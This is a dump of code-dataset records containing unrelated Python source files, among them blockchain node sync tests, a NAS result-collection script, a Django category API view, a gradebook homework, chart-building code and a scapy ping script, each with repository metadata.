cons = list(server_1.all_connections.values())[:]
for con in cons:
await con.close()
for block in blocks_rest:
await full_node_3.full_node.respond_block(full_node_protocol.RespondBlock(block))
assert full_node_3.full_node.blockchain.get_peak().height >= block.height
log.warning(f"FN3 height {full_node_3.full_node.blockchain.get_peak().height}")
# TODO: fix this flaky test
await time_out_assert(120, node_height_exactly, True, full_node_3, 999)
await server_2.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_2.full_node.on_connect)
await server_3.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_3.full_node.on_connect)
await server_3.start_client(PeerInfo(self_hostname, uint16(server_2._port)), full_node_3.full_node.on_connect)
await time_out_assert(180, node_height_exactly, True, full_node_1, 999)
await time_out_assert(180, node_height_exactly, True, full_node_2, 999)
@pytest.mark.asyncio
async def test_batch_sync(self, two_nodes):
# Must be below "sync_block_behind_threshold" in the config
num_blocks = 20
num_blocks_2 = 9
blocks = bt.get_consecutive_blocks(num_blocks)
blocks_2 = bt.get_consecutive_blocks(num_blocks_2, seed=b"123")
full_node_1, full_node_2, server_1, server_2 = two_nodes
# 12 blocks to node_1
for block in blocks:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# 9 different blocks to node_2
for block in blocks_2:
await full_node_2.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_2.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_2, num_blocks - 1)
@pytest.mark.asyncio
async def test_backtrack_sync_1(self, two_nodes):
blocks = bt.get_consecutive_blocks(1, skip_slots=1)
blocks = bt.get_consecutive_blocks(1, blocks, skip_slots=0)
blocks = bt.get_consecutive_blocks(1, blocks, skip_slots=0)
full_node_1, full_node_2, server_1, server_2 = two_nodes
# 3 blocks to node_1 in different sub slots
for block in blocks:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_2.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_2, 2)
@pytest.mark.asyncio
async def test_backtrack_sync_2(self, two_nodes):
blocks = bt.get_consecutive_blocks(1, skip_slots=3)
blocks = bt.get_consecutive_blocks(8, blocks, skip_slots=0)
full_node_1, full_node_2, server_1, server_2 = two_nodes
# 3 blocks to node_1 in different sub slots
for block in blocks:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_2.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_2, 8)
@pytest.mark.asyncio
async def test_close_height_but_big_reorg(self, three_nodes):
blocks_a = bt.get_consecutive_blocks(50)
blocks_b = bt.get_consecutive_blocks(51, seed=b"B")
blocks_c = bt.get_consecutive_blocks(90, seed=b"C")
full_node_1, full_node_2, full_node_3 = three_nodes
server_1 = full_node_1.full_node.server
server_2 = full_node_2.full_node.server
server_3 = full_node_3.full_node.server
for block in blocks_a:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
for block in blocks_b:
await full_node_2.full_node.respond_block(full_node_protocol.RespondBlock(block))
for block in blocks_c:
await full_node_3.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_2.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_1, 50)
await time_out_assert(60, node_height_exactly, True, full_node_2, 50)
await time_out_assert(60, node_height_exactly, True, full_node_3, 89)
await server_3.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_3.full_node.on_connect,
)
await server_3.start_client(
PeerInfo(self_hostname, uint16(server_2._port)),
on_connect=full_node_3.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_1, 89)
await time_out_assert(60, node_height_exactly, True, full_node_2, 89)
await time_out_assert(60, node_height_exactly, True, full_node_3, 89)
@pytest.mark.asyncio
async def test_sync_bad_peak_while_synced(self, three_nodes, default_1000_blocks, default_10000_blocks):
# Must be larger than "sync_block_behind_threshold" in the config
num_blocks_initial = len(default_1000_blocks) - 250
blocks_750 = default_1000_blocks[:num_blocks_initial]
full_node_1, full_node_2, full_node_3 = three_nodes
server_1 = full_node_1.full_node.server
server_2 = full_node_2.full_node.server
server_3 = full_node_3.full_node.server
full_node_3.full_node.weight_proof_handler = None
for block in blocks_750:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Node 3 syncs from a different blockchain
for block in default_10000_blocks[:1100]:
await full_node_3.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_2.full_node.on_connect)
# The second node should eventually catch up to the first one, and have the
# same tip at height num_blocks - 1
await time_out_assert(180, node_height_exactly, True, full_node_2, num_blocks_initial - 1)
# set new heavy peak, fn3 cannot serve wp's
# node 2 should keep being synced and receive blocks
await server_3.start_client(PeerInfo(self_hostname, uint16(server_3._port)), full_node_3.full_node.on_connect)
# trigger long sync in full node 2
peak_block = default_10000_blocks[1050]
await server_2.start_client(PeerInfo(self_hostname, uint16(server_3._port)), full_node_2.full_node.on_connect)
con = server_2.all_connections[full_node_3.full_node.server.node_id]
peak = full_node_protocol.NewPeak(
peak_block.header_hash,
peak_block.height,
peak_block.weight,
peak_block.height,
peak_block.reward_chain_block.get_unfinished().get_hash(),
)
await full_node_2.full_node.new_peak(peak, con)
await asyncio.sleep(2)
assert not full_node_2.full_node.sync_store.get_sync_mode()
for block in default_1000_blocks[1000 - num_blocks_initial :]:
await full_node_2.full_node.respond_block(full_node_protocol.RespondBlock(block))
assert node_height_exactly(full_node_2, 999)
@pytest.mark.asyncio
async def test_block_ses_mismatch(self, two_nodes, default_1000_blocks):
full_node_1, full_node_2, server_1, server_2 = two_nodes
blocks = default_1000_blocks
for block in blocks[:501]:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
peak1 = full_node_1.full_node.blockchain.get_peak()
full_node_2.full_node.sync_store.set_long_sync(True)
await server_2.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_2.full_node.on_connect)
wp = await full_node_1.full_node.weight_proof_handler.get_proof_of_weight(peak1.header_hash)
summaries1, _ = _validate_sub_epoch_summaries(full_node_1.full_node.weight_proof_handler.constants, wp)
summaries2 = summaries1
s = summaries1[1]
# change summary so check would fail on 2 sub epoch
summaries2[1] = SubEpochSummary(
s.prev_subepoch_summary_hash,
s.reward_chain_hash,
s.num_blocks_overflow,
s.new_difficulty * 2,
s.new_sub_slot_iters * 2,
)
await full_node_2.full_node.sync_from_fork_point(0, 500, peak1.header_hash, summaries2)
log.info(f"full node height {full_node_2.full_node.blockchain.get_peak().height}")
assert node_height_between(full_node_2, 320, 400)
| [
"[email protected]"
] | |
ffbb923905cedb23748806a6e5a210f52377acc7 | c42672aeac984ab3f57d840710e145f4e918ba01 | /nasws/cnn/search_space/monodepth/analysis.py | 872b130085e3b8170a5f7d4627a9b3fd1c6b5248 | [
"MIT"
] | permissive | kcyu2014/nas-landmarkreg | 00212b6015d1fef3e7198bfa596fa69a898167c2 | a00c3619bf4042e446e1919087f0b09fe9fa3a65 | refs/heads/main | 2023-07-21T19:52:19.392719 | 2021-08-24T09:37:24 | 2021-08-24T09:37:24 | 350,368,390 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,434 | py | import os
import glob
from collections import defaultdict
from monodepth.utils.reporter import tensorboard_check_tags, tensorboard_load_summary, count_parameters_in_MB_search
from monodepth.utils.checkpointer import load_args
from monodepth.models import MidasNet, MidasNetSearch
from nni.nas.pytorch.fixed import FixedArchitecture
import torch
from monodepth.utils.checkpointer import load_json
from thop import profile
import numpy as np
def sort_tb_pairs(l, ignore_index=True):
slist = list(sorted(l, key=lambda x: x[0]))
if ignore_index:
return list(zip(*slist))[1]
else:
return slist
def average_last_K(l, top_K=5):
return sum(l[-top_K:]) / top_K
def collect_experiment_kdt_from_tensorboard(path):
args = load_args(path + '/args.json')
# print(args)
# store all the results as follow
tb_paths = glob.glob(path + '/log/*')
res = defaultdict()
for p in tb_paths:
# print(p)
tags = tensorboard_check_tags(p)
for t in tags:
steps, r = tensorboard_load_summary(p, t)
if t in res:
res[t] += list(zip(steps, r))
else:
res[t] = list(zip(steps, r))
tag_specified = [
'validation/sparse_kdt_0.0001',
'validation/sparse_spr_0.0001']
final_res = {}
for tag in tag_specified:
d = sort_tb_pairs(res[tag])
final_res[tag] = average_last_K(d)
return final_res
def collect_experiment_result(path):
# the final evaluation model should be recomputed based on the results over server
# load args
args = load_args(path + '/args.json')
# print(args)
# store all the results as follow
tb_paths = glob.glob(path + '/log/*')
res = defaultdict()
for p in tb_paths:
# print(p)
tags = tensorboard_check_tags(p)
for t in tags:
steps, r = tensorboard_load_summary(p, t)
if t in res:
res[t] += list(zip(steps, r))
else:
res[t] = list(zip(steps, r))
# print(res.keys())
# collect the associated statistics
num_epoch = len(res['train/sum'])
num_channels = 256 # fixed across the entire dataset
num_cells = 4
seed = 0
# store all the intermediate results of 1 run.
all_train_loss = sort_tb_pairs(res['train/sum'])
all_valid_loss = sort_tb_pairs(res['validation/ReDWeb'])
train_loss = average_last_K(sort_tb_pairs(res['train/sum']))
valid_loss = average_last_K(sort_tb_pairs(res['validation/ReDWeb']))
# from the current log, this is at is. we do not have more to analyze
# From this point, we need to get the result from checkpoint and store all the statistics accordingly
# use this to directly apply
arch = load_json(path + '/arch.json')
print('processing architecture ',arch)
model = MidasNetSearch(backbone='resnext101_wsl', args=args)
mutator = FixedArchitecture(model, arch)
mutator.reset()
ckpt_path = path + '/checkpoint.pt'
if os.path.exists(ckpt_path):
print('loading checkpoint...')
checkpoint = torch.load(ckpt_path)
model.load_state_dict(checkpoint['model'])
print('finish loading the model ...')
# count parameters
num_param = count_parameters_in_MB_search(model, arch)
return num_epoch, train_loss, valid_loss, num_param, arch, all_train_loss, all_valid_loss
| [
"[email protected]"
] | |
00868bf5c2508b4f24084132b710bd214998c056 | 524acbbc16eac0ef28da58ff9f79d02d7cadcf1b | /backend/shop_time/categories/views.py | be8c7d554b3cbf84338a20c5cf0a4fe64763644b | [] | no_license | ZandTree/art-shop | 47eb6ed6f328157c852cef6e324e4be5ab3592f8 | faa506fb62f845168b9874a720c0b62808245058 | refs/heads/master | 2023-06-01T06:40:28.755068 | 2021-06-18T23:53:57 | 2021-06-18T23:53:57 | 376,624,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | from rest_framework.views import APIView
from .models import Category
from .serializer import CategorySerializer
from rest_framework.permissions import AllowAny
from rest_framework import status
from rest_framework.response import Response
class CategoryList(APIView):
""" get all categories with tree structure"""
permission_classes = (AllowAny,)
def get(self,request,format=None):
"""
loop only for cat and sub_cat == 1 level inclusiveness;
need more: make loop deeper
"""
if Category.objects.all().exists():
categories = Category.objects.all()
result = []
for cat in categories:
if not cat.parent:
item = {}
item['id'] = cat.id
item['name'] = cat.name
item['slug'] = cat.slug
item['sub_categories'] = []
for category in categories:
sub_item = {}
if category.parent and category.parent.id == cat.id:
sub_item['id'] = category.id
sub_item['name'] = category.name
sub_item['sub_categories'] = []
item['sub_categories'].append(sub_item)
result.append(item)
return Response({'categories':result},status=status.HTTP_200_OK)
else:
# instead of 404 ( server error)
return Response({'errors':'No categories found'},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# def get_queryset(self, queryset=None):
#qs = Category.objects.all()
# TODO
# return queryset
# return queryset.get_cached_trees | [
"[email protected]"
] | |
d116cf499ae6b5ea0e40f3a62ee8e3bcd94e6a5e | 824f19d20cdfa26c607db1ff3cdc91f69509e590 | /random/strings/345. Reverse Vowels of a String.py | 88e11095e0c062114eea3783f47a5500cedfc1f9 | [] | no_license | almamuncsit/LeetCode | 01d7e32300eebf92ab54c983de6e183242b3c985 | 17aa340649574c37067ec170ceea8d9326be2d6a | refs/heads/master | 2021-07-07T09:48:18.069020 | 2021-03-28T11:26:47 | 2021-03-28T11:26:47 | 230,956,634 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | class Solution:
def reverseVowels(self, s: str) -> str:
s_list = list(s)
vowels = set({'a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'})
left = 0
right = len(s_list)-1
while right > left:
if s_list[left] in vowels and s_list[right] in vowels:
s_list[left], s_list[right] = s_list[right], s_list[left]
left += 1
right -= 1
else:
if s_list[left] not in vowels:
left += 1
if s_list[right] not in vowels:
right -= 1
return ''.join(s_list)
sol = Solution()
print(sol.reverseVowels("leetcode"))
| [
"[email protected]"
] | |
68dccaff016d11cce153e1b9db7affab3c07bd9b | 01ea95d7301b9ad3b84f11c8cbcfe02d00017250 | /bin/until/echarts/Line.py | 74f27f3640b6945c26b0de1fc9a04cfdff387304 | [] | no_license | windyStreet/MQSTATIC | 82962ae7a43d015dac61cb6ffce8d8853e6774df | b5a3d3862bd824b4a08b1c29436e417a9590dcab | refs/heads/master | 2020-12-02T21:13:37.952192 | 2017-07-20T10:20:14 | 2017-07-20T10:20:14 | 96,275,208 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,518 | py | #!/usr/bin/env python
# !-*- coding:utf-8 -*-
import datetime
from bin.until import Logger
from bin.until import Time
from bin.until import Mongo
from bin.until import DBCODE
from bin.until import Filter
from bin.logic import BO
from bin.until import Data
L = Logger.getInstance()
class Line(object):
# search_filter_infos = None, _step = 60, _step_count = 7, _title_text = "数据统计", _type = "line"
def __init__(self, _search_filter_infos, _title_text, _type, _step=60, _step_count=7):
self._search_filter_infos = _search_filter_infos
self._step_count = _step_count
self._step = _step
self._title_text = _title_text
self._type = _type
self.start_time = None
self.end_time = None
def getFileter(self):
pass
def getLineChartData(self):
series = []
_legend_datas = []
for key in self._search_filter_infos:
_legend_data = key
_legend_datas.append(_legend_data)
_search_filter_info = self._search_filter_infos[key]
_project = _search_filter_info['project_name']
self_collection = _search_filter_info['self_collection']
_filter_infos = _search_filter_info['filter_infos']
_statistic_type = _search_filter_info['statistic_type']
_statistic_name = _search_filter_info['statistic_name']
self.start_time = Time.getStartTime(step=self._step, step_count=self._step_count) # 获取起始时间
is_search_db = False
for _filter_info in _filter_infos:
key = _filter_info['key']
relation = _filter_info['relation']
value = _filter_info['value']
if key == 'time' and (relation == DBCODE.GT or relation == DBCODE.GTE):
self.start_time = value # 过滤条件中的起始时间
elif key == 'time' and (relation == DBCODE.LTE or relation == DBCODE.LT):
self.end_time = value # 过滤条件中的终止时间
else:
is_search_db = True
times = Time.getComputeTimes(start_time=self.start_time, end_time=self.end_time, step=self._step)
series_data = [] # y轴上的信息
if is_search_db is True: # 多条件查询
_self_filter = Filter.getInstance()
_self_filter.filter("project", _project, DBCODE.EQ)
_self_filter.filter("type", _statistic_type, DBCODE.EQ)
for _filter_info in _filter_infos:
if _filter_info['key'] != 'time':
_self_filter.filter(_filter_info['key'], _filter_info['value'], _filter_info['relation'])
for i in range(len(times) - 1):
_self_filter.filter("createtime", times[i], DBCODE.GT)
_self_filter.filter("createtime", times[i + 1], DBCODE.LTE)
_filter = _self_filter.filter_json()
count = self_collection.find(_filter).count()
series_data.append(count)
else:
# 计划分批次查询
res_collection = Mongo.getInstance(table=BO.BASE_statistic_res).getCollection()
res_filter = Filter.getInstance()
res_filter.filter("statistical_time", times[0], DBCODE.GT)
res_filter.filter("statistical_time", times[-1], DBCODE.LTE)
res_filter.filter("statistical_step", self._step, DBCODE.EQ)
res_filter.filter("statistical_type", _statistic_type, DBCODE.EQ)
res_filter.filter("statistical_project", _project, DBCODE.EQ)
if Data.isNone(_statistic_name):
_statistic_name = None
res_filter.filter("statistical_name", _statistic_name, DBCODE.EQ)
print(res_filter.filter_json())
ress = res_collection.find(res_filter.filter_json()).sort("statistical_time", -1) # 计算前半部分值
self._step_count = len(times) - 1
series_data = Data.getD4tArr(len=self._step_count, default_value=0) # 坐标轴上的值
# 先来尝试组合数据,发现数据无法组合完整时,补充数据
i = 0
for res in ress:
if i == 0 and ress.count() != (len(times) - 1) and res['statistical_time'] != times[-1]:
# 重新补录一个值
_self_filter = Filter.getInstance()
if not Data.isNone(_statistic_name):
_self_filter.filter("name", _statistic_name, DBCODE.EQ)
_self_filter.filter("project", _project, DBCODE.EQ)
_self_filter.filter("type", _statistic_type, DBCODE.EQ)
_self_filter.filter("createtime", times[-2], DBCODE.GT)
_self_filter.filter("createtime", times[-1], DBCODE.LTE)
_filter = _self_filter.filter_json()
count = self_collection.find(_filter).count()
series_data[i] = count
series_data[i + 1] = res['statistical_count']
i = i + 2
else:
series_data[i] = res['statistical_count']
i = i + 1
series_data.reverse()
xAxis_data = times[1:] # 横坐标轴信息[] 时间信息 去掉首要点
serie = {
"name": _legend_data,
"type": self._type,
"showSymbol":False,
"smooth":True,
# "stack": '总量',
"data": series_data.copy() # 坐标轴上的值
}
series.append(serie)
_result = {
"title": {
"text": self._title_text
},
"legend": {
"data": _legend_datas.copy()
},
"xAxis": {
"data": xAxis_data.copy()
},
"series": series
}
return _result
def getInsatnce(search_filter_infos=None, _title_text="数据统计", _type="line", _step=60, _step_count=7):
if search_filter_infos is None:
L.warn("init Line , not search_filter_infos par")
return None
return Line(search_filter_infos, _title_text, _type, _step, _step_count)
| [
"[email protected]"
] | |
4442f06af05e88ccdffcc17cb294b3645525b836 | 29d1b8d1e01cda9c963b68074a4de18a67ef8c00 | /home_work_12 (2).py | 99d9ac6838eaff5c464b28f3ff3759fcacf019b8 | [
"MIT"
] | permissive | acc-cosc-1336/cosc-1336-fall-2017-stevepaul135 | fd515d3c7fdb75f408a045f4329efd6dfb783323 | 691cafe85cabd8f5829323fec77676d96c9225d4 | refs/heads/master | 2021-08-28T03:09:16.436604 | 2017-12-11T04:58:15 | 2017-12-11T04:58:15 | 103,597,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,082 | py | #Stephen Paul's 12th homework assignment
class Person:
def __init__(self, first_name, last_name):
self.name = first_name + ' ' + last_name
def displayPerson(self):
print("This persons name is", self.name)
class Student(Person):
def __init__(self, student_id, first_name, last_name, enroll_date):
self.student_id = student_id
self.__enrollDate = enroll_date
Person.__init__(self, first_name, last_name)
def displayStudentInfo(self):
print(self.student_id, self.name, self.__enrollDate)
class Professor(Person):
def __init__(self, professor_id, first_name, last_name, hire_date):
self.hire = hire_date
self.professor_id = professor_id
Person.__init__(self, first_name, last_name)
def displayProfessoInfo(self):
print(self.professor_id, self.name, self.hire)
class Course:
def __init__(self, course_id, title, credit_hours, professor):
self.course_id = course_id
self.title = title
self.hours = credit_hours
self.professor = professor #Should be a professor object
def displayCourseInfo(self):
print(self.course_id, self.title, self.hours, self.professor.name)
class Enrollment:
def __init__(self, enrollment_id, student, course, grade):
self.enrollment_id = enrollment_id
self.course = course #should be a course object
self.student = student #should be a student object
self.grade = grade
def displayEnrollment(self):
print(format(self.enrollment_id, '3')," ", format(self.course.title, '17'), format(self.course.hours,'12'), ' ', format(self.student.name,'24'), format(self.grade, '10'))
def changeGrade(self,new_grade):
self.grade = new_grade
class Transcript:
def __init__(self, student):
self.student_enrollments = {}
self.student = student #Should be a student object
def addEnrollments(self, enrollment): #enrollment should be an enrollment object
self.student_enrollments[enrollment.enrollment_id] = enrollment
def displayTranscript(self):
print("Name ", self.student.name)
print("Class ", "Credit Hours", "Credit Points", "Grade Points", "Grade")
creditpoint = ' '
gradepoint = ' '
Total_Credit_hours = 0
Total_Grade_Point = 0
for entry in self.student_enrollments:
if self.student_enrollments[entry].grade == 'A':
creditpoint = 4
elif self.student_enrollments[entry].grade == 'B':
creditpoint = 3
elif self.student_enrollments[entry].grade == 'C':
creditpoint = 2
elif self.student_enrollments[entry].grade == 'D':
creditpoint = 1
elif self.student_enrollments[entry].grade == 'F':
creditpoint = 0
elif self.student_enrollments[entry].grade == "I":
creditpoint = " "
elif self.student_enrollments[entry].grade == 'W':
creditpoint = " "
else:
creditpoint = " " #Case only when the Grade in an Enrollment hasn't been Updated
if creditpoint != " ":
gradepoint = creditpoint * self.student_enrollments[entry].course.hours
Total_Credit_hours += self.student_enrollments[entry].course.hours
Total_Grade_Point += gradepoint
print(format(self.student_enrollments[entry].course.title, '15'), format(self.student_enrollments[entry].course.hours, "11"), format(creditpoint, '12'), format(gradepoint, '13')," ", format(self.student_enrollments[entry].grade,'5'))
else:
gradepoint = " "
print(format(self.student_enrollments[entry].course.title, '15'), format(self.student_enrollments[entry].course.hours, "11"), format(creditpoint, '12'), format(gradepoint, '13')," ", format(self.student_enrollments[entry].grade,'5'))
print('-' * 60)
print(format(Total_Credit_hours, "26"), format(Total_Grade_Point, "25"))
print( "GPA :", Total_Grade_Point/Total_Credit_hours)
class Gradebook:
def __init__(self):
self.students = {}
#add to student dictionary
s = Student(1, "Carson", "Alexander", "09012005")
self.students[s.student_id] = s
s = Student(2, "Meredith", "Alonso", "09022002")
self.students[s.student_id] = s
s = Student(3, "Arturo", "Anand", "09032003")
self.students[s.student_id] = s
s = Student(4, "Gytis", "Barzdukas", "09012001")
self.students[s.student_id] = s
s = Student(5, "Peggy", "Justice", "09012001")
self.students[s.student_id] = s
s = Student(6, "Laura", "Norman", "09012003")
self.students[s.student_id] = s
s = Student(7, "Nino", "Olivetto", "09012005")
self.students[s.student_id] = s
self.professors = {}
#professor_id first_name last_name hire_date
p = Professor(1, "Kim", "Abercrombie", "1995-03-11")
self.professors[p.professor_id] = p
p = Professor(2, "Fadi", "Fakhouri", "2002-07-06")
self.professors[p.professor_id] = p
p = Professor(3, "Roger", "Harui", "1998-07-01")
self.professors[p.professor_id] = p
p = Professor(4, "Candace", "Kapoor", "2001-01-15")
self.professors[p.professor_id] = p
p = Professor(5, "Roger", "Zheng", "2004-02-12")
self.professors[p.professor_id] = p
self.courses = {}
#add to course dictionary
c = Course(1050, "Chemistry", 3, self.professors[1])
self.courses[c.course_id] = c
c = Course(4022, "Microeconomics", 3, self.professors[2])
self.courses[c.course_id] = c
c = Course(4041, "Macroeconomics", 3, self.professors[3])
self.courses[c.course_id] = c
c = Course(1045, "Calculus", 4, self.professors[4])
self.courses[c.course_id] = c
c = Course(3141, "Trigonometry", 4, self.professors[4])
self.courses[c.course_id] = c
c = Course(2021, "Composition", 3, self.professors[5])
self.courses[c.course_id] = c
c = Course(2042, "Literature", 4, self.professors[5])
self.courses[c.course_id] = c
self.enrollments = {}
#add enrolled students into courses
enroll_id = 11050 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[1], self.courses[1050], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 14022 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[1], self.courses[4022], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 14041 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[1], self.courses[4041], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 21045 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[2], self.courses[1045], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 23141 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[2], self.courses[3141], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 22021 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[2], self.courses[4041], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 31050 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[3], self.courses[1050], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 41050 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[4], self.courses[1050]," ")
self.enrollments[enroll_id] = enrollment
enroll_id = 44022 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[4], self.courses[4022], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 54041 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[5], self.courses[2021], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 61045 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[6], self.courses[1045], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 73141 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[7], self.courses[3141], " ")
self.enrollments[enroll_id] = enrollment
| [
"[email protected]"
] | |
34f47be9ef55d3d72a7abc700bc1d17d771fd10e | f82e67dd5f496d9e6d42b4fad4fb92b6bfb7bf3e | /scripts/client/gui/scaleform/daapi/view/meta/serverstatsmeta.py | 4a28fbbfafb863429e1181c69015f9b805026cc8 | [] | no_license | webiumsk/WOT0.10.0 | 4e4413ed4e7b00e22fb85d25fdae9400cbb4e76b | a84f536c73f86d9e8fab559e97f88f99f2ad7e95 | refs/heads/master | 2021-01-09T21:55:00.662437 | 2015-10-23T20:46:45 | 2015-10-23T20:46:45 | 44,835,654 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | # Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/ServerStatsMeta.py
from gui.Scaleform.framework.entities.BaseDAAPIComponent import BaseDAAPIComponent
class ServerStatsMeta(BaseDAAPIComponent):
def getServers(self):
self._printOverrideError('getServers')
def relogin(self, id):
self._printOverrideError('relogin')
def isCSISUpdateOnRequest(self):
self._printOverrideError('isCSISUpdateOnRequest')
def startListenCsisUpdate(self, startListenCsis):
self._printOverrideError('startListenCsisUpdate')
def as_setPeripheryChangingS(self, isChanged):
if self._isDAAPIInited():
return self.flashObject.as_setPeripheryChanging(isChanged)
def as_setServersListS(self, servers):
if self._isDAAPIInited():
return self.flashObject.as_setServersList(servers)
def as_disableRoamingDDS(self, disable):
if self._isDAAPIInited():
return self.flashObject.as_disableRoamingDD(disable)
def as_setServerStatsS(self, stats, tooltipType):
if self._isDAAPIInited():
return self.flashObject.as_setServerStats(stats, tooltipType)
def as_setServerStatsInfoS(self, tooltipFullData):
if self._isDAAPIInited():
return self.flashObject.as_setServerStatsInfo(tooltipFullData)
| [
"[email protected]"
] | |
02a29652ff4002ff213de2e6753b4912bb85ea9e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_392/ch4_2019_06_05_14_33_33_171155.py | cdcdf2b3d67996003e841afaca8af0a2d1c0ff25 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | def classifica_idade(x):
if x <= 11:
return'crianca'
elif x >= 12 and x <= 17:
return 'adolescente'
else:
return 'adulto'
| [
"[email protected]"
] | |
bfc18eaa66e8178ea1f6ceae0421145d57bb023a | 8821970a489ea190ab7dd6a2da8f672681138543 | /piston/web/__init__.py | acfc64d31c318a7da92d7c776160f900b4897930 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | grey580/piston | ab293d449728c9fbcc442adc0463135628548deb | 5a3472517e2de14e75eb688cf9335b2c98c3e6f4 | refs/heads/master | 2021-01-09T05:35:52.587268 | 2017-02-02T09:37:50 | 2017-02-02T09:37:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,583 | py | import re
from ..utils import strfdelta, strfage
from ..storage import configStorage as configStore
from .app import app, socketio
from ..steem import SteemConnector
from . import views, assets
import logging
log = logging.getLogger(__name__)
steem = SteemConnector().getSteem()
__ALL__ = [
"app",
"assets",
"forms",
"socketio",
"views",
]
@app.template_filter('age')
def _jinja2_filter_age(date, fmt=None):
""" Format a datatime as age
"""
return strfage(date, fmt)
@app.template_filter('excert')
def _jinja2_filter_datetime(data):
""" Extract an excert of a post
"""
words = data.split(" ")
return " ".join(words[:100])
@app.template_filter('parseBody')
def _jinja2_filter_parseBody(body):
""" Pre-process the body of a post before
showing in the UI
"""
body = re.sub(
r"^(https?:.*/(.*\.(jpg|png|gif))\??.*)",
r"\n\n",
body, flags=re.MULTILINE)
return body
@app.template_filter('currency')
def _jinja2_filter_currency(value):
""" Format the crypto tokens properly
:param float value: The amount to format as string
"""
return "{:,.3f}".format(value)
def run(port, host):
""" Run the Webserver/SocketIO and app
"""
socketio.run(app,
debug=configStore.get("web:debug"),
host=host,
port=port)
# FIXME: Don't use .run()
# from gevent.wsgi import WSGIServer
# from yourapplication import app
# http_server = WSGIServer(('', 5000), app)
# http_server.serve_forever()
| [
"[email protected]"
] | |
34d6d85b02c3b8d0e8734802762acb51523c3fa1 | b56c584ba04de13c7a05f6633893b318eb3fb19d | /课后作业/第五天作业/guoqijun/Chapter 12/scapy_ping_one_new.py | a64b040c34aa4916e5a8141ec9405dfbff24807a | [] | no_license | I318928/Python-Homework | 42133f1291cc3da90293f994ae1a09dce618bdad | 139b450f4bf2e4831688df80c12f43edcc00e468 | refs/heads/master | 2020-06-01T06:53:50.733061 | 2019-04-17T12:12:16 | 2019-04-17T12:12:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
from scapy.all import *
def qytang_ping(ip):
ping_pkt = IP(dst=ip) / ICMP()
ping_result = sr1(ping_pkt, timeout=1, verbose=False)
if ping_result:
return ip, 1
else:
return ip, 0
if __name__ == '__main__':
result = qytang_ping('192.168.220.129')
if result[1]:
print(result[0], '通!')
else:
print(result[0], '不通!')
| [
"[email protected]"
] | |
